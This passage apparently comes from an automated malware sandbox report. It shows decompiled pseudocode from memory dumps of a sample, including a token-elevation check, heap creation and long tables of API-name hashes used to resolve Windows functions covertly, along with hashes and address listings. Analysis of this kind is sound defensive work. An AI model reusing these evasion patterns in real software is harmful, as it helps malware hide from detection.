                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnumValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2814608202-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E6E9B1030(void* __ecx) {
                                                                                                                                                  				void* _v36;
                                                                                                                                                  				void* _v44;
                                                                                                                                                  				int _t15;
                                                                                                                                                  				intOrPtr* _t21;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				intOrPtr* _t25;
                                                                                                                                                  
                                                                                                                                                  				_t24 = __ecx;
                                                                                                                                                  				 *_t25 = 0;
                                                                                                                                                  				_t21 = E6E9B306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  				if(_t21 == 0) {
                                                                                                                                                  					L5:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_push(_t25);
                                                                                                                                                  				_push(8);
                                                                                                                                                  				_push(_t24);
                                                                                                                                                  				if( *_t21() == 0 || E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
                                                                                                                                                  					goto L5;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t2 = _t25 + 8 - 4; // 0x150c05f8
                                                                                                                                                  					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
                                                                                                                                                  					if(_t15 == 0) {
                                                                                                                                                  						goto L5;
                                                                                                                                                  					}
                                                                                                                                                  					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
                                                                                                                                                  				}
                                                                                                                                                  			}










                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E9B1089
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4114910276-0
                                                                                                                                                  • Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
                                                                                                                                                  • Instruction ID: 7b00b57ef8b13ec93b375f382686ea571cb6fd117fd5040d11794260c4935d16
                                                                                                                                                  • Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
                                                                                                                                                  • Instruction Fuzzy Hash: 06F06DB0B44683ABFA40D5BD9C68F7F32ED5FC2654F508838B540CA194EF78C9498A26
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 29%
                                                                                                                                                  			E6E9B3628(void* __ecx) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				intOrPtr* _t7;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  
                                                                                                                                                  				_t9 = __ecx;
                                                                                                                                                  				if( *0x6e9bd228 == 0xa33c83e5) {
                                                                                                                                                  					_t7 = E6E9B3064(0x60a28c5c, 0x1c6ef387);
                                                                                                                                                  					 *0x6e9bd22c = E6E9B3064(0x60a28c5c, 0x5e0afaa3);
                                                                                                                                                  					if( *0x6e9bd228 == 0xa33c83e5) {
                                                                                                                                                  						 *_t7(2, 0, 0, 0, 0, 0); // executed
                                                                                                                                                  						 *0x6e9bd228 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t3 = E6E9B3064(0x60a28c5c, 0x45b68b68);
                                                                                                                                                  				if(_t3 == 0) {
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(_t9);
                                                                                                                                                  					_push(8);
                                                                                                                                                  					_push( *0x6e9bd228);
                                                                                                                                                  					asm("int3");
                                                                                                                                                  					asm("int3");
                                                                                                                                                  					return _t3;
                                                                                                                                                  				}
                                                                                                                                                  			}







                                                                                                                                                  APIs
                                                                                                                                                  • RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E9ADE09,?,?), ref: 6E9B3692
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                  • Opcode ID: 552daa9a0349565eb8ba516fa66b446886e76ea57532c112228795d3609a1eb2
                                                                                                                                                  • Instruction ID: 08ba49f895f8164c3c916ec293dea71e76b29e94dc4d771bb941838149c6118c
                                                                                                                                                  • Opcode Fuzzy Hash: 552daa9a0349565eb8ba516fa66b446886e76ea57532c112228795d3609a1eb2
                                                                                                                                                  • Instruction Fuzzy Hash: F4F02464156284FFEA60CDFAAC09C53929CEFA1245B000C38F280E1200D6F0C440CE31
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  C-Code - Quality: 31%
                                                                                                                                                  			E6E9A1494(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                  				void* _v68;
                                                                                                                                                  				char _v72;
                                                                                                                                                  				char _v76;
                                                                                                                                                  				char _v80;
                                                                                                                                                  				char _v84;
                                                                                                                                                  				char _v88;
                                                                                                                                                  				char _v92;
                                                                                                                                                  				char _v96;
                                                                                                                                                  				char _v100;
                                                                                                                                                  				char _v104;
                                                                                                                                                  				char _v108;
                                                                                                                                                  				char _v112;
                                                                                                                                                  				char _v116;
                                                                                                                                                  				char _v120;
                                                                                                                                                  				char _v124;
                                                                                                                                                  				char _v128;
                                                                                                                                                  				char _v132;
                                                                                                                                                  				char _v136;
                                                                                                                                                  				char _v140;
                                                                                                                                                  				char _v144;
                                                                                                                                                  				char _v148;
                                                                                                                                                  				char _v152;
                                                                                                                                                  				char _v156;
                                                                                                                                                  				char _v160;
                                                                                                                                                  				char _v164;
                                                                                                                                                  				char _v168;
                                                                                                                                                  				char _v172;
                                                                                                                                                  				char _v176;
                                                                                                                                                  				char _v180;
                                                                                                                                                  				char _v184;
                                                                                                                                                  				char _v188;
                                                                                                                                                  				char _v192;
                                                                                                                                                  				char _v196;
                                                                                                                                                  				char _v200;
                                                                                                                                                  				char _v204;
                                                                                                                                                  				char _v208;
                                                                                                                                                  				char _v212;
                                                                                                                                                  				char _v216;
                                                                                                                                                  				char _v220;
                                                                                                                                                  				char _v224;
                                                                                                                                                  				char _v228;
                                                                                                                                                  				char _v232;
                                                                                                                                                  				char _v236;
                                                                                                                                                  				char _v240;
                                                                                                                                                  				char _v244;
                                                                                                                                                  				char _v248;
                                                                                                                                                  				char _v252;
                                                                                                                                                  				char _v256;
                                                                                                                                                  				char _v260;
                                                                                                                                                  				char _v264;
                                                                                                                                                  				char _v268;
                                                                                                                                                  				char _v272;
                                                                                                                                                  				char _v276;
                                                                                                                                                  				void* _v288;
                                                                                                                                                  				intOrPtr _v292;
                                                                                                                                                  				char _v296;
                                                                                                                                                  				char _v300;
                                                                                                                                                  				char _v304;
                                                                                                                                                  				char _v308;
                                                                                                                                                  				char _v312;
                                                                                                                                                  				char _v316;
                                                                                                                                                  				char _v320;
                                                                                                                                                  				char _v324;
                                                                                                                                                  				char _v340;
                                                                                                                                                  				char _v344;
                                                                                                                                                  				char _v348;
                                                                                                                                                  				char _v352;
                                                                                                                                                  				char _v356;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				void* _t282;
                                                                                                                                                  				intOrPtr* _t310;
                                                                                                                                                  				intOrPtr* _t318;
                                                                                                                                                  				intOrPtr* _t434;
                                                                                                                                                  				intOrPtr* _t480;
                                                                                                                                                  				void* _t481;
                                                                                                                                                  
                                                                                                                                                  				_t481 = __eflags;
                                                                                                                                                  				_t480 =  &_v60;
                                                                                                                                                  				_v40 = __ecx;
                                                                                                                                                  				_v76 = 0;
                                                                                                                                                  				E6E9AF584( &_v72, 0);
                                                                                                                                                  				_v60 = 0xe7942190;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v76, E6E9AF4CC( &_v76) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v80, E6E9AF4CC( &_v80) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v88 = _v88 + 1;
                                                                                                                                                  				_t325 =  &_v84;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v84, E6E9AF4CC(_t325) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v88, E6E9AF4CC( &_v88) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v96 = _v96 + 1;
                                                                                                                                                  				_t329 =  &_v92;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v92, E6E9AF4CC(_t329) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v96, E6E9AF4CC( &_v96) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v104 = _v104 + 1;
                                                                                                                                                  				_t333 =  &_v100;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v100, E6E9AF4CC(_t333) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v104, E6E9AF4CC( &_v104) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v112 = _v112 + 1;
                                                                                                                                                  				_t337 =  &_v108;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v108, E6E9AF4CC(_t337) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v112, E6E9AF4CC( &_v112) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v120 = _v120 + 1;
                                                                                                                                                  				_t341 =  &_v116;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v116, E6E9AF4CC(_t341) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v120, E6E9AF4CC( &_v120) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v128 = _v128 + 1;
                                                                                                                                                  				_t345 =  &_v124;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v124, E6E9AF4CC(_t345) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v128, E6E9AF4CC( &_v128) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v136 = _v136 + 1;
                                                                                                                                                  				_t349 =  &_v132;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v132, E6E9AF4CC(_t349) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v136, E6E9AF4CC( &_v136) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v144 = _v144 + 1;
                                                                                                                                                  				_t353 =  &_v140;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v140, E6E9AF4CC(_t353) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v144, E6E9AF4CC( &_v144) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v152 = _v152 + 1;
                                                                                                                                                  				_t357 =  &_v148;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v148, E6E9AF4CC(_t357) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v152, E6E9AF4CC( &_v152) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v160 = _v160 + 1;
                                                                                                                                                  				_t361 =  &_v156;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v156, E6E9AF4CC(_t361) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v160, E6E9AF4CC( &_v160) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v168 = _v168 + 1;
                                                                                                                                                  				_t365 =  &_v164;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v164, E6E9AF4CC(_t365) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v168, E6E9AF4CC( &_v168) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v176 = _v176 + 1;
                                                                                                                                                  				_t369 =  &_v172;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v172, E6E9AF4CC(_t369) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v176, E6E9AF4CC( &_v176) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v184 = _v184 + 1;
                                                                                                                                                  				_t373 =  &_v180;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v180, E6E9AF4CC(_t373) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v184, E6E9AF4CC( &_v184) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v192 = _v192 + 1;
                                                                                                                                                  				_t377 =  &_v188;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v188, E6E9AF4CC(_t377) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v192, E6E9AF4CC( &_v192) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v200 = _v200 + 1;
                                                                                                                                                  				_t381 =  &_v196;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v196, E6E9AF4CC(_t381) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v200, E6E9AF4CC( &_v200) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v208 = _v208 + 1;
                                                                                                                                                  				_t385 =  &_v204;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v204, E6E9AF4CC(_t385) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v208, E6E9AF4CC( &_v208) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_t434 = _t480;
                                                                                                                                                  				 *_t434 =  *_t434 + 1;
                                                                                                                                                  				E6E9B4200(0x60a28c5c, _t434);
                                                                                                                                                  				E6E9AF4BC( &_v212, 0x10);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x450], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v216, 0x20);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x458], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v220, 0x30);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x460], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v224, 0x40);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x468], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v228, 0x50);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x470], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v232, 0x60);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x478], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v236, 0x70);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x480], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v240, 0x80);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x488], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v244, 0x90);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x490], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v248, 0xa0);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x498], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v252, 0xb0);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4a0], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v256, 0xc0);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4a8], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v260, 0xd0);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4b0], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v264, 0xe0);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4b8], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v268, 0xf0);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4c0], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v272, 0x100);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4c8], xmm0");
                                                                                                                                                  				_t282 = E6E9AF4BC( &_v276, 0);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [esp], xmm0");
                                                                                                                                                  				_v252 = E6E9A1D2C(_v248, _t434, _t481, _t282, _t282);
                                                                                                                                                  				_t318 = _t434;
                                                                                                                                                  				E6E9AB27C( &_v248, _v256, _t481, _v252, _t318);
                                                                                                                                                  				E6E9AF840( &_v296, _t481);
                                                                                                                                                  				_v300 = 0;
                                                                                                                                                  				_t410 =  &_v296;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v296, E6E9AF4CC(_t410) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v300, E6E9AF4CC( &_v300) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v308 = _v308 + 1;
                                                                                                                                                  				_t414 =  &_v304;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v304, E6E9AF4CC(_t414) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v308, E6E9AF4CC( &_v308) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v316 = _v316 + 1;
                                                                                                                                                  				_t418 =  &_v312;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v312, E6E9AF4CC(_t418) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v316, E6E9AF4CC( &_v316) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_v324 = _v324 + 1;
                                                                                                                                                  				_t422 =  &_v320;
                                                                                                                                                  				asm("pxor xmm0, xmm0");
                                                                                                                                                  				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
                                                                                                                                                  				asm("movq [ecx+0x18], xmm0");
                                                                                                                                                  				E6E9AF828( &_v320, E6E9AF4CC(_t422) + 0x10);
                                                                                                                                                  				E6E9AF4BC( &_v324, E6E9AF4CC( &_v324) + 0xfffffff0);
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				 *_t480 =  *_t480 + 1;
                                                                                                                                                  				_t310 = _t480;
                                                                                                                                                  				_push(_t310);
                                                                                                                                                  				_push(_t318);
                                                                                                                                                  				_push(_v292);
                                                                                                                                                  				_t154 = _t310 + 0x2c; // 0x2c
                                                                                                                                                  				E6E9AB9FC(_t154,  *_t480);
                                                                                                                                                  				E6E9AF4BC( &_v340, 0);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4d8], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v344, 0x10);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4e0], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v348, 0x20);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4d0], xmm0");
                                                                                                                                                  				E6E9AF4BC( &_v352, 0x30);
                                                                                                                                                  				asm("movq xmm0, [eax+0x8]");
                                                                                                                                                  				asm("movq [ebp+0x4e8], xmm0");
                                                                                                                                                  				E6E9AF654( &_v316);
                                                                                                                                                  				return E6E9AF654( &_v356);
                                                                                                                                                  			}
                                                                                                                                                  0x6e9a16ad
                                                                                                                                                  0x6e9a16b0
                                                                                                                                                  0x6e9a16b4
                                                                                                                                                  0x6e9a16b8
                                                                                                                                                  0x6e9a16bf
                                                                                                                                                  0x6e9a16d1
                                                                                                                                                  0x6e9a16e7
                                                                                                                                                  0x6e9a16f2
                                                                                                                                                  0x6e9a16f3
                                                                                                                                                  0x6e9a16f4
                                                                                                                                                  0x6e9a16f5
                                                                                                                                                  0x6e9a16f6
                                                                                                                                                  0x6e9a16f9
                                                                                                                                                  0x6e9a16fd
                                                                                                                                                  0x6e9a1701
                                                                                                                                                  0x6e9a1708
                                                                                                                                                  0x6e9a171a
                                                                                                                                                  0x6e9a1730
                                                                                                                                                  0x6e9a173b
                                                                                                                                                  0x6e9a173c
                                                                                                                                                  0x6e9a173d
                                                                                                                                                  0x6e9a173e
                                                                                                                                                  0x6e9a173f
                                                                                                                                                  0x6e9a1742
                                                                                                                                                  0x6e9a1746
                                                                                                                                                  0x6e9a174a
                                                                                                                                                  0x6e9a1751
                                                                                                                                                  0x6e9a1763
                                                                                                                                                  0x6e9a1779
                                                                                                                                                  0x6e9a1784
                                                                                                                                                  0x6e9a1785
                                                                                                                                                  0x6e9a1786
                                                                                                                                                  0x6e9a1787
                                                                                                                                                  0x6e9a1788
                                                                                                                                                  0x6e9a178b
                                                                                                                                                  0x6e9a178f
                                                                                                                                                  0x6e9a1793
                                                                                                                                                  0x6e9a179a
                                                                                                                                                  0x6e9a17ac
                                                                                                                                                  0x6e9a17c2
                                                                                                                                                  0x6e9a17cd
                                                                                                                                                  0x6e9a17ce
                                                                                                                                                  0x6e9a17cf
                                                                                                                                                  0x6e9a17d0
                                                                                                                                                  0x6e9a17d1
                                                                                                                                                  0x6e9a17d4
                                                                                                                                                  0x6e9a17d8
                                                                                                                                                  0x6e9a17dc
                                                                                                                                                  0x6e9a17e3
                                                                                                                                                  0x6e9a17f5
                                                                                                                                                  0x6e9a180b
                                                                                                                                                  0x6e9a1816
